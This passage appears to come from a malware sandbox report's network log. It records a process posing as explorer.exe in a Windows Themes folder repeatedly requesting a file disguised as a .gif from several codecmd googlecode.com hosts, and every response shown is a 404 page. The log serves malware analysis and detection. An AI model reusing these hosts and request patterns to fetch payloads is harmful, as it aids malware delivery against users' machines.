70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:16.596133947 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              90192.168.2.651241173.194.76.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:17.018819094 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:17.698915958 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:17 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:17.698937893 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              91192.168.2.651242142.251.173.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:18.069808006 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:19.426481009 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:18 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:19.426503897 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:10:19.426518917 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:10:19.426754951 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:18 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:19.427232027 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:18 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              92192.168.2.65124364.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:19.721442938 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:20.438009024 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:20 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:20.438038111 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              93192.168.2.651244173.194.76.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:20.889018059 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:21.546964884 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:21 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:21.546983004 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              94192.168.2.651245142.251.173.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:22.024246931 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:23.361267090 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:22 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:23.361413002 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:10:23.361424923 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:10:23.361475945 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:22 GMT
